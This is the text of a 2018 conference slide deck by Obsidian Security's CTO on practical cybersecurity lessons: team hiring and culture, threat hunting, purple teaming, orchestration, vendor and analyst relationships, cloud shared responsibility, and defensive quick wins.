Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

Focus Your Humans Where They Should Focus

  • 1. Ben Johnson | Co-Founder & CTO March 7th, 2018 Practical Cyber Lessons from 500,000 Miles of Security Evangelism
  • 2. @chicagoben | @obsidiansec Background Check // Ben Johnson Co-Founder and CTO, Obsidian Co-Founder and Former CTO, Carbon Black Former CNO/Cyber // NSA, CIA, DoD
  • 3. AGENDA Introduction & Background Looking Inward People, Processes, Technology Looking Outward Vendors, Resellers, Analysts Cloud Call-Out Wrap-Up
  • 4. @chicagoben | @obsidiansec Today’s Goal? TO SPARK CONTEMPLATION (and give you something to remember!) https://www.slideshare.net/chicagoben/
  • 5. @chicagoben | @obsidiansec Cyber Scoreboard How are we doing?
  • 6. @chicagoben | @obsidiansec Plenty of Challenges SKILLS GAP DEPLOY-AND-DECAY =LACK OF CYBER SELF-ESTEEM HUGE DATA ATTACKER SUCCESSES
  • 7. @chicagoben | @obsidiansec Looking Inward People, Processes, & Technology
  • 8. @chicagoben | @obsidiansec People - Team “Individuals disappear on high performing teams.” - NASA
  • 9. @chicagoben | @obsidiansec People - Recruiting & Retaining “Hire for Passion, Train for Skill, Coach for Performance” “Passion, Capacity, Humility” Considerations: • Security Teams Need a Leader…and a Shield • Don’t hire just based on tool experience!! “Capacity” ... “Hire a bartender” • Mentoring & Growth Creative perks? New data? Coding to APIs? • Talent Density and Solving Challenging Problems https://venturebeat.com/2017/10/21/how-to-build-your-dynasty-hire-for-passion-train-for-skill-coach-for-performance/
  • 10. @chicagoben | @obsidiansec People - Too Many Distractions
  • 11. @chicagoben | @obsidiansec People - Essentialism “It is about making the wisest possible investment of your time and energy in order to operate at our highest point of contribution by doing only what is essential."” – Greg McKeown, Author of Essentialism
  • 12. @chicagoben | @obsidiansec People - Journey vs. Destination Security teams focus where they have autonomy. They get comfortable in this never-ending journey vs. driving toward new destinations.
  • 13. @chicagoben | @obsidiansec People - Culture “Culture eats strategy for breakfast” - P. Drucker
  • 14. @chicagoben | @obsidiansec Processes - Extend IT an Olive Branch
  • 16. @chicagoben | @obsidiansec Processes - Adversarial & Threat Modeling Cybercriminals • Broad-based and targeted • Financially motivated • Getting more sophisticated Hactivists • Targeted and destructive • Unpredictable motivations • Generally less sophisticated Nation-States • Targeted and multi-stage • Motivated by data collection • Highly sophisticated with endless resources Insiders • Targeted and destructive • Unpredictable motivations • Sophistication varies
  • 17. @chicagoben | @obsidiansec Processes - Hunting ▪ ALLOW FOR CREATIVITY. ALLOW HUNTERS TO ‘EXPLORE’ ▪ LOOK FOR RISK. LOOK FOR THREATS. ▪ EXCHANGE INFORMATION QUICKLY ▪ LOOK ACROSS THE STACK – CONTEXT ▪ DON’T WAIT FOR MACHINES ▪ MAKE SURE THERE ARE LESSONS LEARNED FROM EACH HUNT
  • 18. @chicagoben | @obsidiansec Processes - Hunting Outcomes ▪ NOT ALWAYS MALWARE OR APT OR MALICIOUS ACTIVITY. ▪ WHERE TO HUNT? ▪ WHAT TO HUNT? ▪ WHERE ARE MY GAPS? ▪ WHERE ARE MY STRENGTHS? ▪ WHERE DO I NEED MORE CARE AND FEEDING?
  • 19. @chicagoben | @obsidiansec Processes - Red + Blue = Purple • Sit red team next to blue team! • Once an attack or a technique works, have the blue team fix it (or update detection rules, etc), then immediately try again to make sure it is now prevented or detected • Drive Immediate Improvements
  • 20. @chicagoben | @obsidiansec Processes: Engineers vs Analysts
  • 21. @chicagoben | @obsidiansec TITLE TEXT Processes: Too Focused On Market Segments
  • 22. @chicagoben | @obsidiansec Layers-Fu: Focus on Capabilities Hunting & Collaborating Integration & Automation Hardening & Prevention Retrospection Behavior Detection Attribute Detection Remediation Triage Visibility
  • 23. @chicagoben | @obsidiansec Layers-Fu: ROI of Time? Hunting & Collaborating Integration & Automation Hardening & Prevention Retrospection Behavior Detection Attribute Detection Remediation Triage Visibility
  • 24. @chicagoben | @obsidiansec Technology: Prioritize Collection Compromised (attacker present) Recovered (attacker expelled) Breach Discovered (attacker identified) DWELL TIME Proactively collecting data here is automated, efficient & conclusive Reactively collecting data here is time consuming, expensive & incomplete Compromised (attacker present) Recovered (attacker expelled) Breach Discovered (attacker identified) DWELL TIME You know what questions you’ll have… Make sure you can answer them! Setup the video camera before the robbery. Move Fast, Don’t Wait on Technology!
  • 25. @chicagoben | @obsidiansec Technology: Visibility & Context Scanning Continuous Recording Continuous Recording + Intelligence Continuous Recording + Intelligence + Prevalence Continuous Recording + Intelligence + Prevalence + Relationships
  • 26. @chicagoben | @obsidiansec TITLE TEXT Focus Your Humans Where They Should Focus! Alert where it makes sense!
  • 28. @chicagoben | @obsidiansec Technology : Visible, Surveyed Environment Nodes are processes & domains Clustered by affinity
  • 29. @chicagoben | @obsidiansec JOIN, or DIEAUTOMATE, or DIE Technology: Integration & Automation
  • 30. @chicagoben | @obsidiansec Technology: Orchestration Alert Generated Validate, Correlate, and Enhance Threat Intelligence Device History User Profile & Behaviors Alert Enriched Block IPs Kill Process, Preserve Evidence Reset Credentials Remediation Actions
  • 31. @chicagoben | @obsidiansec Technology: Orchestration Case Study • 2 Security Engineers • 20 alerts a day • Manually processed 5 alerts (25%) • Data aggregation ~2 hours • Time to resolution ~7 days • 2 Security Engineers • 200 alerts day • Automatically process 100% of alerts • Data aggregation ~10 mins • Time to resolution is <1hr “Orchestration allowed us to add additional pieces to the stack to cover more gaps without an increase in headcount Today it is easier to install new security technology than hire people to run it, therefore, orchestration alleviates lack of available security talent.” Pre-Orchestration Post-Orchestration
  • 32. @chicagoben | @obsidiansec Technology: Get Creative! (Open Source?)
  • 33. @chicagoben | @obsidiansec Looking Inward: Quick Wins • Whitelist domains (top 10k?) • Disable Java & Flash!! • Or Patch (Java => 70% of alerts disappeared overnight) • Restrict Powershell to particular times of day! • Disable/Expire Admin Accounts Until You Need Them • Log every command line for common utilities • Can you “lock down” a particular division, group, etc? • Give your HVTs/VIPs iPads!
  • 34. @chicagoben | @obsidiansec Looking Outward Vendors, Resellers, & Analysts
  • 35. @chicagoben | @obsidiansec Security Industry != Security Community Proliferation Consolidation
  • 36. @chicagoben | @obsidiansec Security Industry != Security Community
  • 37. @chicagoben | @obsidiansec Vendors: Competing Priorities & Incentives • Big Guys vs. Small Guys • Terminology War; Press Coverage • Hard to Measure Effectiveness • Don’t fall for ‘competitive traps’ • YOUR PROBLEMS vs. product features • Force interoperability/integration • Partner w/ Early Stage Companies: best time to capture innovation and value
  • 38. @chicagoben | @obsidiansec Resellers: Competing Priorities & Incentives • Margins & Relationships • Comfortable or Easy • Large Packages vs. Niche Deals • Verify that solutions match needs • Ask for new or holistic approaches • Get personal with resellers
  • 39. @chicagoben | @obsidiansec Analysts: Competing Priorities & Incentives • Pay to Play • Scoring Based on Discussions • Gamed / Sponsored Evaluations • Not Operators • Understand the ‘why’ behind scoring • Ask which non-customer they like • Blogs vs. Reports
  • 40. @chicagoben | @obsidiansec Cloud Call Out ( Do you understand the risks? )
  • 41. @chicagoben | @obsidiansec Race to the Cloud! Lots of benefits of cloud adoption … we aren’t really here for that.
  • 42. @chicagoben | @obsidiansec Cloud Security Responsibility Cloud Service Provider: responsible for security OF the cloud Customer: responsible for security IN the cloud
  • 43. @chicagoben | @obsidiansec Cloud Security Responsibility Hackers want this!
  • 44. @chicagoben | @obsidiansec Wrapping Up (Take-Aways and more)
  • 45. @chicagoben | @obsidiansec Take-Aways: Looking Inward • People Hire for passion, train for skill, coach for performance Focus on ROI of Time • Processes Approach as an engineering problem Work with IT Concentrate on capabilities • Technology Integrate, Automate, and Orchestrate Blend Open Source & Commercial Focus on how technology enhances humans
  • 46. @chicagoben | @obsidiansec Take-Aways: Looking Outward • Interacting with Vendors Don’t fall for competitive traps Partner w/ Early Stage Companies • Interacting with Resellers Verify that solutions match needs Get personal • Interacting with Analysts Understand the ‘why’ Utilize their relationships for introductions
  • 47. @chicagoben | @obsidiansec Take-Aways: Cloud Call-Out Understand where, how, and why you are using cloud. Understand who is responsible. Providers need to do more. They could reduce users shooting themselves in the foot, improve default security levels, and better show surface area. (Please encourage them to do more!) The rest is on you: (Awareness, Auditing, Adaptation, Automation)! (and don’t forget hygiene.)
  • 48. @chicagoben | @obsidiansec COMPROMISE IS INEVITABLE Attacker only has to be successful once, but defender has to stop 100% of attacks Once the attacker is in your environment, they should have to be 100% perfect.
  • 49. @chicagoben | @obsidiansec What About Top 5? • Approach Security (Risk Management) as an Engineering Problem • Fix “Provision-and-Forget” and “Deploy-and-Decay” ▪ Reduce Entropy, Reduce Risk (I.T. is your best friend) ▪ Treat Your Users as Smart (Enable Your National Guard) ▪ Make it Fun
  • 50. What’s Obsidian? (Other than a start-up in SoCal)
  • 51. Ben Johnson, CTO ben@obsidiansecurity.com @chicagoben | @obsidiansec THANK YOU! https://www.slideshare.net/chicagoben/